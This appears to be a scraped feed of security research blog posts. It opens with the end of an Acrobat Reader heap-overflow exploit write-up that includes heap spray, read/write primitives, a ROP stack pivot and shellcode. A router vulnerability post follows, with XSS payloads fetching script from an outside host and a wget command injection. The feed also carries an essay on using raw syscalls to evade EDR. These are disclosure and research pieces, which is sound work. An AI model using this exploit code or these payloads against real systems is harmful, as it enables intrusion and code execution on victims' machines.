        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

Obtain pointers to the relevant modules to calculate their base addresses.
Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
Write the shellcode.
Call VirtualProtect to change the shellcode memory region permissions to allow execution.
Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Pavel Yosifovich
Next Windows Internals TrainingPavel Yosifovich
2 October 2021 at 14:42

Next Windows Internals Training

Pavel Yosifovich

By: Pavel Yosifovich

2 October 2021 at 14:42

I am announcing the next 5 day Windows Internals remote training to be held in January 2022, starting on the 24th according to the followng schedule:

Jan 24 – 2pm to 10pm (all times are based on London time)
Jan 25, 26, 27 – 2pm to 6pm
Jan 31 – 2pm to 10pm
Feb 1, 2, 3 – 2pm to 6pm

The syllabus can be found here (slight changes are possible if new important topics come up).

Cost and Registration

I’m keeping the cost of these training classes relatively low. This is to make these classes accessible to more people, especially in these unusual and challenging times.

Cost: 800 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details). Previous students of my classes are entitled to a 10% discount.

To register, send an email to [email protected] and specify “Windows Internals Training” in the title. The email should include your name, contact email, time zone, and company name (if any).

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Windows11

zodiacon

Include Security Research Blog
Drive-By Compromise: A Tale Of Four RoutersJoel St. John
1 October 2021 at 01:58

Drive-By Compromise: A Tale Of Four Routers

Include Security Research Blog

By: Joel St. John

1 October 2021 at 01:58

The consumer electronics market is a mess when it comes to the topic of security, and particularly so for routers and access points. We’ve seen a stark increase in demand for device work over the past year and even some of the best-funded products make plenty of security mistakes. There are a dozen vendors selling products within any portion of this market and it is incredibly hard to discern the overall security posture of a device from a consumer’s perspective. Even security professionals struggle with this – the number one question I’ve received when I describe my security work in this space to non-security people is "Okay, then what router should I buy?" I still don’t feel like I have a good answer to that question.

¯\(ツ)/¯

Hacking on a router is a great way to learn about web and device security, though. This industry seems stuck in a never-ending cycle in which security is almost always an afterthought. Devices are produced at the cheapest cost manageable, and proper security testing is an expensive endeavor. Products ship full of security vulnerabilities, see support for a handful of years, and then reach end-of-life only to be replaced by the new shiny model.

For years I’ve given this as my number one recommendation to people new to infosec as a means of leveling up their skills. In late 2020, someone asked me for practical advice on improving at web application security. I told him to go buy the cheapest router he could find on Amazon and that I’d help walk him through it. This ended up being the WAVLINK AC1200, clocking in at a whopping $28 at the time.

Of course, I was personally tempted into get involved, so I picked one up myself. After a couple weekends playing with the device I’d found quite a few bugs. This culminated in a solid chain of vulnerabilities that made it fairly simple to remotely compromise the device – all from simply visiting an attacker-controlled webpage (aka ‘drive-by’ attack). This is a pretty amazing feeling, and doing this sort of work has turned into a hobby. $28 for a few weekends of fun? Cheaper than a lot of options out there!

This initial success got me excited enough that I bought a few more devices at around the same price-point. They delivered in a similar fashion, giving me quite a bit of fun during the winter months of 2020. First, though, let’s dive into the WAVLINK AC1200…

WAVLINK AC1200

When initially digging into this, I didn’t bother to check for prior work as the journey is the fun part. Several of the vulnerabilities I discovered were found independently (and earlier) by others, and some of them have been publicly disclosed. The other vulnerabilities were either disclosed in private, or caught internally by WAVLINK – the firmware released in December 2020 seems to have patched it all. If you happen to have one, you should definitely go install the updated firmware.

Alright, let’s get into it. There are a few things going on with this router:

A setup wizard is not disabled after being used, letting unauthenticated callers set the device password.
Cross-site request forgery (CSRF) throughout the management console.
Cross-site scripting (XSS) in the setup wizard.
A debug console that allows execution of arbitrary system commands.

The Magical Setup Wizard

When first provisioning the device, users are met with a pretty simple setup wizard:

When you save, the application sends a POST request like the following:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&wl_reddomain=WO&time_zone=UTC+04:00&newpass=Password123&wizardpage=/wizard.shtml&hashkey=0abdb6489f83d63a25b9a025b8a518ad&syskey=M98875&wl_reddomain1=WO&time_zone1=UTC+04:00&newpass1=supersecurepassword

Once this wizard is completed, the endpoint is not disabled, essentially allowing an attacker to re-submit the setup wizard. Since it’s implemented to not require authentication, an attacker can call back with a properly-formed request if someone happens to visit an attacker-controlled website. It can also be cleaned up a bit, as only some of the parameters are required:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=<attacker-supplied password>

In addition, the wizardpage parameter is vulnerable to reflected XSS and we can use a single request to pull in some extra JavaScript:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=hunter2&wizardpage=</script><script src="http://q.mba:1234/poc.js">//

When a victim visits our page, we can see this request in the HTTP server logs:

This additional code can be used for all sorts of nefarious purposes, but first…

Command Execution as a Service

One of the bugs that was reported on fairly extensively had to do with this lovely page, hidden in the device’s webroot:

The reports claimed that this is a backdoor, though honestly it seems more like a debug/test console to me. Regardless, it’s pretty useful for this exploit

With the additional JavaScript pulled in via XSS, we can force the targeted user into logging into the web console (with the newly set password) and then use the debug console to pull down a file:

POST /cgi-bin/adm.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysCMD&command=wget+http://q.mba:1234/rce.txt+-O+/etc_ro/lighttpd/www/rce.txt&SystemCommandSubmit=Apply

In this case I’m just using wget, but it would be pretty trivial to do something more meaningful here. All-in-all, quite a fun time working this all out and it proved to be a great training exercise for some folks.

Cudy and Tenda

The next two devices that came across my desk for IoT research practice were the Cudy WR1300 and the Tenda AC6V2. While not quite as vulnerable as the WAVLINK, they were both quite vulnerable in their ‘default’ state. That is, if someone were to purchase one and just plug in an Ethernet cable, it’d work perfectly well but attacks can easily exploit gaps in the web management interfaces.

The Tenda AC6v2

For this device, exploitation is trivial if the device hasn’t been provisioned. Since you plug it in and It Just Works, this is fairly likely. Even if a victim has set a password, then attacks are possible if a victim is logged into the web interface, or an attacker can guess or crack the password.

We ended up reporting several findings:

CSRF throughout the web console.
Command injection in the NTP configuration (a classic, at this point).
MD5-hashed user passwords stored in a cookie.
The aforementioned gap introduced by not requiring users to complete web provisioning before use.

Only 1 and 2 are required for remote compromise. We reported these back in May and received no response, and the firmware has not been updated at the time of writing this post.

The Cudy WR1300

For this device, users are not prompted to change the default password (admin), even if they happen to log into the web interface to set the device up. The console login is also vulnerable to CSRF, which is a nasty combination. Once logged in, users can be redirected to a page that is vulnerable to reflected XSS, something like:

http://192.168.10.1/cgi-bin/luci/admin/network/bandwidth?iface=wlan10&icon=icon-wifi&i18name=<script>yesitsjustthateasy</script>

this enables an attacker to bypass the CSRF protections on other pages. Of particular interest are the network utilities, each of which (ping/traceroute/nslookup) are vulnerable to command injection. To sum it all up, the exploit chain ends up looking as follows:

Use CSRF to log into the web console (admin/admin).
Redirect to the page vulnerable to cross-site scripting.
Bypass CSRF protections in order to exploit command injection in the ping test feature.

We reported these findings to Cudy in May as well, and they have released new firmware for this device. We haven’t been able to verify the fixes, however we recommend updating to the most recent firmware if you happen to have one of these devices.

Firmware Downgrades For Fun and Profit

The final device that I ended up taking a look in this batch is the Netgear EX6120:

The EX6120 is a fairly simple WiFi range extender that’s been on the market for several years now, at about the same price point as the other devices. This is one that I’d actually purchased a couple years prior but hadn’t found a good way to compromise. After finishing up with the other devices, I was hungry for more and so tried hacking on this one again. Coming back to something with a fresh set of eyes can often yield great results, and that was definitely the case for this device.

When I sit down to test one of these devices my first step is always to patch the firmware to the latest version. On a recent assessment I’d found a CSRF vulnerability that was the result of a difference in the Content-Type on a request. Essentially, all POST requests with the typical Content-Type used throughout the application (x-www-form-urlencoded) were routed through some common code that enforced CSRF mitigations. However, a couple endpoints in the application supported file uploads and those used multipart forms which conveniently lacked CSRF protections.

With that fresh in my mind, as I was upgrading the firmware I tried removing the CSRF token in much the same way. Sure enough – it worked! I crossed my fingers and tested against the most recent firmware, and it had not been patched yet. This vulnerability on its own is okay, though as mentioned previously it’s not all that likely that a victim is going to be logged into the web console and that would be required to exploit it.

It didn’t take very long to find a way, though. In a very similar fashion, multipart-form requests did not seem to require authentication at all. I’ve seen this previously in other applications and the root cause is often quite similar to the gap in CSRF protections. A request or two uses some fundamentally different way of communicating with the application and as such doesn’t enforce the same restrictions. It’s a bit of a guess as to what the root cause in this specific case is, but that’s my best guess

We reported this to Netgear in May as well, and they got back to us fairly quickly. Updated firmware has been released, however we haven’t verified the fixes.

Final Thoughts

As always, doing this sort of research has been a very rewarding experience. Plenty of bugs found and reported, new techniques learned, and overall just a lot of fun to play around with. The consumer device space feels like something ripped out of time, where we can rewind twenty years to the ‘good old days’ where exploits of this nature were commonplace. We do see some signs of improvement here and there, but as you go to buy your next device consider the following:

Is the device from a recognized brand? How long have they been around? How’s their track record for security vulnerabilities? How have they responded to vulnerabilities in the past?
Cheaper is not always better. It’s absolutely crazy how cheap some of this hardware has become, and you’re generally getting what you paid for. Software security is expensive to do right and if it seems too good to be true, it often is.
Does the device have known vulnerabilities? This can be as simple as searching for ‘<brand> <model> vulnerabilities’.
How likely is it that you’ll log in to install new firmware? If the answer is ‘not often’ (and no judgement if so – many security professionals I know are plenty guilty here!) then consider getting a model with support for automatic updates.

And finally, while this post has covered vulnerabilities in a lot of cheaper devices, sometimes the more expensive ones can be just as vulnerable. Doing a little research can go a long way towards making informed choices. We hope this post helps illustrate just how vulnerable some of these devices can be.

The post Drive-By Compromise: A Tale Of Four Routers appeared first on Include Security Research Blog.

VoidSec
Crucial’s MOD Utility LPE – CVE-2021-41285voidsec
29 September 2021 at 13:08

Crucial’s MOD Utility LPE – CVE-2021-41285

VoidSec

By: voidsec

29 September 2021 at 13:08

The post Crucial’s MOD Utility LPE – CVE-2021-41285 appeared first on VoidSec.

http://dronesec.pw/
the fanciful allure and utility of syscallsBryan Alexander
12 May 2021 at 21:10

the fanciful allure and utility of syscalls

http://dronesec.pw/

By: Bryan Alexander

12 May 2021 at 21:10

So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing “raw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.

This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.

Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. Crowdstrike Falcon, Cylance, CybeReason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.

Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.

syscalling

Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:

1	`NtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);`

This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:

00007ffb`1676d4f0 4c8bd1           mov     r10, rcx
00007ffb`1676d4f3 b83f000000       mov     eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503             jne     ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05             syscall 
00007ffb`1676d504 c3               ret     
00007ffb`1676d505 cd2e             int     2Eh
00007ffb`1676d507 c3               ret

This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.

Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.

With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.

syscall values are not consistent

j00ru maintains the go-to source for both nt and win32k, and by blindly searching around on here you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.

There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk in raising our threat profile with the EDRs ML model.

Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, setup the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?

The least-bad option of these is baking the codes into your payload and switching at runtime based on the detection of the system version. In memory this is going to look like an s-box switch, but there are no extraneous calls to in-memory or on-disk files or stumbles up or down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.

syscall’s miss useful/critical functionality

In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.

In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more “helpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc) this might not be much of an issue, but expanding beyond that comes with great caveat.

the spooky functions are probably being called anyway

In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.

But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true though because EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel of the cross process injection — is that enough to avoid heightened scrutiny? Maybe.

Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc? None of the syscall evasion is going to work here because, naturally, a majority of those don’t need to syscall into the kernel (or do via other ntdll functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.

syscall’s are partially effective at escaping UM data sinks

Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.

Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:

UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook we would know:

Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
Process A allocated memory in Process B with X permissions (EtwTi)
Process A wrote data into Process B VAS (EtwTi)
Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)

It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin overtime as adoption of the feed grows and the API matures.

A strong argument for syscalls here is that it evades custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the bayesian model, this might be a great reason to use them.

your testing isn’t comprehensive or indicative of the general case

This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deploys of new EDRs there is typically a learning or passive phase; that allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.

Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.

This also means that pinpointing the reason why your payload works or doesn’t work is a bit of dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used ntdll or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can we definitively point to the syscall evasion as the threat score culprit?

At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristic, and thereby the entire network’s model. Repeated testing taints the analysis chain as it grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud which is then in the hands of both automated and manual tooling and analysis. If you disabled this portion, then, you also lack an accurate representation of detection capabilities.

In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (ie. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight but we lose a significant chunk of EDR capability. Isolation is difficult.

anyway

These things, when taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique and I’ve become exhausted by the veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.

I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.

for EDR

Do not rely on user mode hooks and, more importantly, do not implicitly trust it. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:

Monitoring your hot patches for modification
Encrypting telemetry
Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
“Validating” client processes

The fact is anything emitted from an unsigned, untrusted, user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.

The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.

for red team

Using raw syscalls is but a small component of a greater system — evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.

There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.

Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!) can be quite effective at improving an enterprises agent models. And not only one enterprises model; consider the fact that these data points are shared amongst all vendor subscribers, used to subsequently improve those agent models. Burning a technique is no longer isolated to a technology or a client.

http://dronesec.pw/
On Exploiting CVE-2021-1648 (splwow64 LPE)Bryan Alexander
10 March 2021 at 21:10

On Exploiting CVE-2021-1648 (splwow64 LPE)

http://dronesec.pw/

By: Bryan Alexander

10 March 2021 at 21:10

In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.

This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then, that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.

This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kasperksy in their great analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look at how they finally chose to patch the bug later — for now.

